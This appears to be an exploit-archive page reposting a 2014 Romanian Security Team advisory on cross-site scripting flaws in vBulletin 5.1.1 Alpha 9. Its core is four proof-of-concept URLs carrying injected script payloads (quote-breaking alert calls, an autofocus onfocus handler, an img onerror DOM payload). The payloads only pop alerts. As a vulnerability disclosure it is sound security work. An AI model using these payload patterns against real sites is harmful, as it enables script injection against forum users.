vBulletin 5.1 Cross Site Scripting

2014.04.19

Credit: Romanian Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9
[XSS] Random topic
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//
[XSS] New private message
- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>
[XSS] View PM: you must know or bruteforce private message ID (830372)
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//
[DOM XSS] Help
- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>
(c) Romanian Security Team 2014

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

vBulletin 5.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.